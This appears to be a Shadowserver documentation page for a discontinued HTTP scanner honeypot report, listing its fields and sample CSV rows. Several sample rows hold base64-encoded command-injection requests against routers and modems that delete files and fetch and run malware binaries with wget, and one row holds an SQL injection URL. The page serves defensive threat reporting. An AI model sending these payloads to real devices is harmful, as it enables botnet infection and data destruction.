LEGACY: HTTP Scanners Report

LAST UPDATED:  2021-06-07

LEGACY REPORT

Report discontinued. Replaced by: Honeypot HTTP Scanner Events Report.

This report identifies hosts that have been observed performing HTTP-based scanning activity, including exploitation attempts.

HTTP scanning may be a benign activity — for example, it may be a search engine indexing the web, a research project, or an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.

Other scans, however, may be part of a network reconnaissance in the preparatory phase of an attack or exploit attempts coming from a botnet that is actively looking to infect new sites or devices. Popular targets include various IoT or VPN devices and CMS systems.

The HTTP report type, originally introduced as part of the EU Horizon 2020 SISSDEN Project has been extended under the INEA CEF VARIoT project.

It now features detailed information on attacks observed against HTTP honeypots, including CVECVSS score, MITRE ATT&CK tactic and technique mappings, affected product information and other exploit information that can be associated with the collected HTTP requests.

Please note this report will be replaced after 2021-06-01 by Honeypot HTTP Scanner Events Report.

Fields

  • timestamp
    Time that the scan was performed in UTC+0
  • ip
    The IP address performing the scan
  • port
    The source port used in the scan
  • asn
    ASN announcing the scanning IP
  • geo
    Country where the scanning IP resides
  • region
    State / Province / Administrative region where the scanning IP resides
  • city
    ASN of where the scanning IP resides
  • hostname
    PTR record of the scanning IP
  • type
    Type of activity observed; i.e. http-scan
  • dst_ip
    The IP address of the target device
  • dst_port
    Destination port used in the scan
  • dst_asn
    ASN announcing the target IP
  • dst_geo
    Country where the target IP resides
  • dst_dns
    FQDN of the target, if applicable and recorded
  • naics
    North American Industry Classification System Code of the scanning IP
  • sic
    Standard Industrial Classification System Code of the scanning IP
  • sector
    Sector to which the attacking IP belongs
  • dst_sector
    Sector to which the target IP belongs
  • public_source
    Source of the data, for cases where the source accepts being credited
  • sensorid
    ID of sensor target device
  • pattern
    Request pattern if recognized by target sensor (e.g., does it match an RFI, LFI, SQLi … )
  • url
    URL being requested by the scanning IP
  • file_md5
    MD5 hash of file downloaded, if any
  • file_sha256
    SHA256 hash of file downloaded, if any
  • request_raw
    Raw request sent by the scanning IP (may be base64 encoded depending on reporting honeypot type)
  • tag
    Array of additional tags, such as iot, vpn for better attack description
  • agent
    User agent of request
  • url_scheme
    Whether HTTP or HTTPS request
  • http_request_method
    HTTP request method (GET, POST, HEAD ...)
  • session_tags
    Array of additional tags describing attack characteristics, example: pre-auth;remote-code-execution
  • vulnerability_enum
    Vulnerability or exploit schema being used, for example CVE or EDB
  • vulnerability_id
    Id of vulnerability or exploit, for example CVE-2020-5902
  • vulnerability_class
    If set, then CVSS
  • vulnerability_score
    CVSS base score
  • vulnerability_severity
    CVSS severity, for example, CRITICAL or HIGH
  • vulnerability_version
    CVSS version of framework used, for example 3.1 or 3.0
  • threat_framework
    Set to MITRE ATT&CK
  • threat_tactic_id
    Array of tactic ids, example TA0001;TA0002
  • threat_technique_id
    Array of technique ids, example T1190;T1059
  • target_vendor
    Vendor that is being targeted, example Linksys
  • target_product
    Product that is being targeted, example Linksys E-Series
  • target_class
    Class of device/software being targeted, for example router
  • body_raw
    Raw body request (may be base64 encoded depending on reporting honeypot type)

Sample

timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw,tag,agent,url_scheme,http_request_method,session_tags,,vulnerability_id,vulnerability_class,vulnerability_score,vulnerability_severity,vulnerability_version,threat_framework,threat_tactic_id,threat_technique_id,target_vendor,target_product,target_class,body_raw
"2021-01-12 00:00:09",162.142.x.x,58188,398324,US,MICHIGAN,"ANN ARBOR",scanner-04.ch1.censys-scanner.com,http-scan,109.169.x.x,8010,25108,UK,,0,,"Information Technology",,,4cdd3e46-de80-40b4-9fbd-452312466a52,unknown,/,,,"GET / HTTP/1.1rnHost: 109.169.x.x:8010",,,,,,,,,,,,,,,,,,
"2021-01-12 00:00:10",167.248.x.x,40464,398722,US,MICHIGAN,"ANN ARBOR",,http-scan,145.220.x.x,9607,1101,NL,,0,,"Information Technology",,CAPRICA-EU,,,/,,,R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDE0NS4yMjAueC54Ojk2MDcNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBDZW5zeXNJbnNwZWN0LzEuMTsgK2h0dHBzOi8vYWJvdXQuY2Vuc3lzLmlvLykNCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K,,"Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)",https,GET,,,,,,,,,,,,,,
"2021-01-12 00:00:12",71.6.x.x,43700,10439,US,CALIFORNIA,"SAN DIEGO",,http-scan,185.82.x.x,805,59729,BG,,0,,Communications,,CAPRICA-EU,,,/,,,R0VUIC8gSFRUUC8xLjENCkFjY2VwdC1FbmNvZGluZzogaWRlbnRpdHkNCkhvc3Q6IDE4NS44Mi54LngNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS80MS4wLjIyMjguMCBTYWZhcmkvNTM3LjM2DQoNCg==,,"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",http,GET,,,,,,,,,,,,,,
"2021-01-12 19:54:26",125.25.x.x,58568,23969,TH,"KRUNG THEP MAHA NAKHON BANGKOK","BANG BON",,http-scan,213.183.x.x,49152,56630,RU,,517311,,Communications,,CAPRICA-EU,,,/soap.cgi?service=WANIPConn1,,,UE9TVCAvc29hcC5jZ2k/c2VydmljZT1XQU5JUENvbm4xIEhUVFAvMS4xDQpIb3N0OiAyMTMuMTgzLngueDo0OTE1Mg0KQ29udGVudC1MZW5ndGg6IDYzMA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpTT0FQQWN0aW9uOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxI0FkZFBvcnRNYXBwaW5nDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgPz48czpFbnZlbG9wZSB4bWxuczpzPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyIgczplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLyI+PFNPQVAtRU5WOkJvZHk+PG06QWRkUG9ydE1hcHBpbmcgeG1sbnM6bT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246MSI+PE5ld1BvcnRNYXBwaW5nRGVzY3JpcHRpb24+PE5ld1BvcnRNYXBwaW5nRGVzY3JpcHRpb24+PE5ld0xlYXNlRHVyYXRpb24+PC9OZXdMZWFzZUR1cmF0aW9uPjxOZXdJbnRlcm5hbENsaWVudD5gY2QgL3RtcDtybSAtcmYgKjt3Z2V0IGh0dHA6Ly8xOTIuMTY4LjEuMTo2MDE5Ny9Nb3ppLm07L3RtcC9Nb3ppLm0gZGxpbmtgPC9OZXdJbnRlcm5hbENsaWVudD48TmV3RW5hYmxlZD4xPC9OZXdFbmFibGVkPjxOZXdFeHRlcm5hbFBvcnQ+NjM0PC9OZXdFeHRlcm5hbFBvcnQ+PE5ld1JlbW90ZUhvc3Q+PC9OZXdSZW1vdGVIb3N0PjxOZXdQcm90b2NvbD5UQ1A8L05ld1Byb3RvY29sPjxOZXdJbnRlcm5hbFBvcnQ+NDU8L05ld0ludGVybmFsUG9ydD48L206QWRkUG9ydE1hcHBpbmc+PFNPQVBFTlY6Qm9keT48U09BUEVOVjplbnZlbG9wZT4NCg0K,iot,"Hello, World",http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2014-8361,,,,,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Realtek,"Realtek SDK",embedded-firmware,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48U09BUC1FTlY6Qm9keT48bTpBZGRQb3J0TWFwcGluZyB4bWxuczptPSJ1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxIj48TmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3TGVhc2VEdXJhdGlvbj48L05ld0xlYXNlRHVyYXRpb24+PE5ld0ludGVybmFsQ2xpZW50PmBjZCAvdG1wO3JtIC1yZiAqO3dnZXQgaHR0cDovLzE5Mi4xNjguMS4xOjYwMTk3L01vemkubTsvdG1wL01vemkubSBkbGlua2A8L05ld0ludGVybmFsQ2xpZW50PjxOZXdFbmFibGVkPjE8L05ld0VuYWJsZWQ+PE5ld0V4dGVybmFsUG9ydD42MzQ8L05ld0V4dGVybmFsUG9ydD48TmV3UmVtb3RlSG9zdD48L05ld1JlbW90ZUhvc3Q+PE5ld1Byb3RvY29sPlRDUDwvTmV3UHJvdG9jb2w+PE5ld0ludGVybmFsUG9ydD40NTwvTmV3SW50ZXJuYWxQb3J0PjwvbTpBZGRQb3J0TWFwcGluZz48U09BUEVOVjpCb2R5PjxTT0FQRU5WOmVudmVsb3BlPg0KDQo=
"2021-01-12 23:42:33",178.72.x.x,2779,44257,RU,"TYUMENSKAYA OBLAST",TYUMEN,,http-scan,195.238.x.x,8080,39260,RO,,811212,,,,CAPRICA-EU,,,/GponForm/diag_Form?images/,,,UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MDgwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogKi8qDQpVc2VyLUFnZW50OiBIZWxsbywgV29ybGQNCkNvbnRlbnQtTGVuZ3RoOiAxMTgNCg0KWFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xOTIuMTY4LjEuMTo4MDg4L01vemkubSstTystPi90bXAvZ3BvbjgwODA7c2grL3RtcC9ncG9uODA4MCZpcHY9MA==,iot,"Hello, World",http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2018-10562,CVSS,9.8,Critical,3.0,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Dasan,"Dasan GPON Home Router",router,WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xOTIuMTY4LjEuMTo4MDg4L01vemkubSstTystPi90bXAvZ3BvbjgwODA7c2grL3RtcC9ncG9uODA4MCZpcHY9MA==
"2021-01-12 23:42:40",223.149.x.x,11923,4134,CN,"HUNAN SHENG",HUAIHUA,,http-scan,159.100.x.x,7574,203833,DE,,517311,,Communications,"Information Technology",CAPRICA-EU,,,/UD/act?1,,,UE9TVCAvVUQvYWN0PzEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo3NTc0DQpVc2VyLUFnZW50OiBIZWxsbywgd29ybGQNClNPQVBBY3Rpb246IHVybjpkc2xmb3J1bS1vcmc6c2VydmljZTpUaW1lOjEjU2V0TlRQU2VydmVycw0KQ29udGVudC1UeXBlOiB0ZXh0L3htbA0KQ29udGVudC1MZW5ndGg6IDY0MA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz48U09BUC1FTlY6RW52ZWxvcGUgeG1sbnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBTT0FQLUVOVjplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLyI+PFNPQVAtRU5WOkJvZHk+PHU6U2V0TlRQU2VydmVycyB4bWxuczp1PSJ1cm46ZHNsZm9ydW0tb3JnOnNlcnZpY2U6VGltZToxJnF1IG90Oz48TmV3TlRQU2VydmVyMT5gY2QgL3RtcCAmJiBybSAtcmYgKiAmJiAvYmluL2J1c3lib3ggd2dldCBodHRwOi8vMTkyLjE2OC4xLjE6ODA4OC9Nb3ppLm0gJiYgY2htb2QgNzc3IC90bXAvdHIwNjQgJiYgL3RtcC90cjA2NCB0cjA2NGA8L05ld05UUFNlcnZlcjE+PE5ld05UUFNlcnZlcjI+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXIyPjxOZXdOVFBTZXJ2ZXIzPmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyMz48TmV3TlRQU2VydmVyND5gZWNobyBERUFUSGA8L05ld05UUFNlcnZlcjQ+PE5ld05UUFNlcnZlcjU+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXI1PjwvdTpTZXROVFBTZXJ2ZXJzPjwvU09BUC1FTlY6Qm9keT48L1NPQVAtRU5WOkVudmVsb3BlPg==,iot,"Hello, world",http,POST,remote-code-execution;pre-auth,,CVE-2016-10372,CVSS,9.8,Critical,3.0,"MITRE ATT&CK",TA0001,T1190,Zyxel,"Eir D1000 modem",modem,PD94bWwgdmVyc2lvbj0iMS4wIj8+PFNPQVAtRU5WOkVudmVsb3BlIHhtbG5zOlNPQVAtRU5WPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyIgU09BUC1FTlY6ZW5jb2RpbmdTdHlsZT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbmNvZGluZy8iPjxTT0FQLUVOVjpCb2R5Pjx1OlNldE5UUFNlcnZlcnMgeG1sbnM6dT0idXJuOmRzbGZvcnVtLW9yZzpzZXJ2aWNlOlRpbWU6MSZxdSBvdDs+PE5ld05UUFNlcnZlcjE+YGNkIC90bXAgJiYgcm0gLXJmICogJiYgL2Jpbi9idXN5Ym94IHdnZXQgaHR0cDovLzE5Mi4xNjguMS4xOjgwODgvTW96aS5tICYmIGNobW9kIDc3NyAvdG1wL3RyMDY0ICYmIC90bXAvdHIwNjQgdHIwNjRgPC9OZXdOVFBTZXJ2ZXIxPjxOZXdOVFBTZXJ2ZXIyPmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyMj48TmV3TlRQU2VydmVyMz5gZWNobyBERUFUSGA8L05ld05UUFNlcnZlcjM+PE5ld05UUFNlcnZlcjQ+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXI0PjxOZXdOVFBTZXJ2ZXI1PmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyNT48L3U6U2V0TlRQU2VydmVycz48L1NPQVAtRU5WOkJvZHk+PC9TT0FQLUVOVjpFbnZlbG9wZT4=
"2021-01-12 23:43:47",111.88.x.x,60843,132165,PK,"SINDH - SOUTH",KARACHI,,http-scan,138.186.x.x,37215,27796,PA,,0,,Communications,"Information Technology",CAPRICA-EU,,,/ctrlt/DeviceUpgrade_1,,,UE9TVCAvY3RybHQvRGV2aWNlVXBncmFkZV8xIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogNDMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQ6ICovKg0KQXV0aG9yaXphdGlvbjogRGlnZXN0IHVzZXJuYW1lPSJkc2xmLWNvbmZpZyIsIHJlYWxtPSJIdWF3ZWlIb21lR2F0ZXdheSIsIG5vbmNlPSI4ODY0NWNlZmIxZjllZGUwZTMzNmUzNTY5ZDc1ZWUzMCIsIHVyaT0iL2N0cmx0L0RldmljZVVwZ3JhZGVfMSIsIHJlc3BvbnNlPSIzNjEyZjg0M2E0MmRiMzhmNDhmNTlkMmEzNTk3ZTE5YyIsIGFsZ29yaXRobT0iTUQ1IiwgcW9wPSJhdXRoIiwgbmM9MDAwMDAwMDEsIGNub25jZT0iMjQ4ZDFhMjU2MDEwMDY2OSINCg0KPD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48czpCb2R5Pjx1OlVwZ3JhZGUgeG1sbnM6dT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5QUFBDb25uZWN0aW9uOjEiPjxOZXdTdGF0dXNVUkw+JCgvYmluL2J1c3lib3ggd2dldCAtZyAxMjcuMC4wLjEgLWwgL3RtcC9za2VyZSAtciAveDsgL2Jpbi9idXN5Ym94IGNobW9kIDc3NyAqIC90bXAvc2tlcmU7IC90bXAvc2tlcmUgZHVja3lzKTwvTmV3U3RhdHVzVVJMPjxOZXdEb3dubG9hZFVSTD4kKGVjaG8gSFVBV0VJVVBOUCk8L05ld0Rvd25sb2FkVVJMPjwvdTpVcGdyYWRlPjwvczpCb2R5PjwvczpFbnZlbG9wZT4NCg0K,iot,,http,POST,remote-code-execution;pre-auth,,CVE-2017-17215,CVSS,8.8,High,3.0,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Huawei,"Huawei Home Gateway HG532",router,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48czpCb2R5Pjx1OlVwZ3JhZGUgeG1sbnM6dT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5QUFBDb25uZWN0aW9uOjEiPjxOZXdTdGF0dXNVUkw+JCgvYmluL2J1c3lib3ggd2dldCAtZyAxMjcuMC4wLjEgLWwgL3RtcC9za2VyZSAtciAveDsgL2Jpbi9idXN5Ym94IGNobW9kIDc3NyAqIC90bXAvc2tlcmU7IC90bXAvc2tlcmUgZHVja3lzKTwvTmV3U3RhdHVzVVJMPjxOZXdEb3dubG9hZFVSTD4kKGVjaG8gSFVBV0VJVVBOUCk8L05ld0Rvd25sb2FkVVJMPjwvdTpVcGdyYWRlPjwvczpCb2R5PjwvczpFbnZlbG9wZT4NCg0K
"2021-01-12 23:35:12",198.251.x.x,57020,8560,US,PENNSYLVANIA,WAYNE,,http-scan,104.168.202.24,80,54290,US,,0,,"Information Technology","Commercial Facilities",CAPRICA-EU,0307847c-448d-4931-a2d7-6441d0b918bc,sqli,"/default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0",,,"POST /default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0 HTTP/1.1rnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rnAccept-Encoding: gzip, deflaternConnection: ClosernContent-Length: 0rnContent-Type: application/x-www-form-urlencodedrnHost: tyderq.usrnReferer: http://tyderq.us/default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0rnUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)",,,,,,,,,,,,,,,,,,
"2021-01-12 23:51:21",39.83.x.x,55018,4837,CN,"SHANGHAI SHI",HUANGPU,,http-scan,185.17.x.x,8081,20860,UK,,517311,,Communications,,CAPRICA-EU,,,/HNAP1/,,,UE9TVCAvSE5BUDEvIEhUVFAvMS4wDQpDb250ZW50LVR5cGU6IHRleHQveG1sOyBjaGFyc2V0PSJ1dGYtOCINClNPQVBBY3Rpb246IGh0dHA6Ly9wdXJlbmV0d29ya3MuY29tL0hOQVAxL2BjZCAvdG1wICYmIHJtIC1yZiAqICYmIHdnZXQgaHR0cDovLzE5Mi4xNjguMS4xL2JpbnMvQXN0cmEubWlwcyAmJiBjaG1vZCAreCBBc3RyYS5taXBzOyAuL0FzdHJhLm1pcHMgaG5hcC5yZXBgDQpDb250ZW50LUxlbmd0aDogNjQwDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+PHNvYXA6RW52ZWxvcGUgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6c29hcD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPjxzb2FwOkJvZHk+PEFkZFBvcnRNYXBwaW5nIHhtbG5zPSJodHRwOi8vcHVyZW5ldHdvcmtzLmNvbS9ITkFQMS8iPjxQb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPmZvb2JhcjwvUG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48SW50ZXJuYWxDbGllbnQ+MTkyLjE2OC4wLjEwMDwvSW50ZXJuYWxDbGllbnQ+PFBvcnRNYXBwaW5nUHJvdG9jb2w+VENQPC9Qb3J0TWFwcGluZ1Byb3RvY29sPjxFeHRlcm5hbFBvcnQ+MTIzNDwvRXh0ZXJuYWxQb3J0PjxJbnRlcm5hbFBvcnQ+MTIzNDwvSW50ZXJuYWxQb3J0PjwvQWRkUG9ydE1hcHBpbmc+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg0KDQo=,iot,,http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2015-2051,,,,,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,D-Link,"D-Link DIR-645, DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",router,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczpzb2FwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PHNvYXA6Qm9keT48QWRkUG9ydE1hcHBpbmcgeG1sbnM9Imh0dHA6Ly9wdXJlbmV0d29ya3MuY29tL0hOQVAxLyI+PFBvcnRNYXBwaW5nRGVzY3JpcHRpb24+Zm9vYmFyPC9Qb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPjxJbnRlcm5hbENsaWVudD4xOTIuMTY4LjAuMTAwPC9JbnRlcm5hbENsaWVudD48UG9ydE1hcHBpbmdQcm90b2NvbD5UQ1A8L1BvcnRNYXBwaW5nUHJvdG9jb2w+PEV4dGVybmFsUG9ydD4xMjM0PC9FeHRlcm5hbFBvcnQ+PEludGVybmFsUG9ydD4xMjM0PC9JbnRlcm5hbFBvcnQ+PC9BZGRQb3J0TWFwcGluZz48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+DQoNCg==

Our 124 Report Types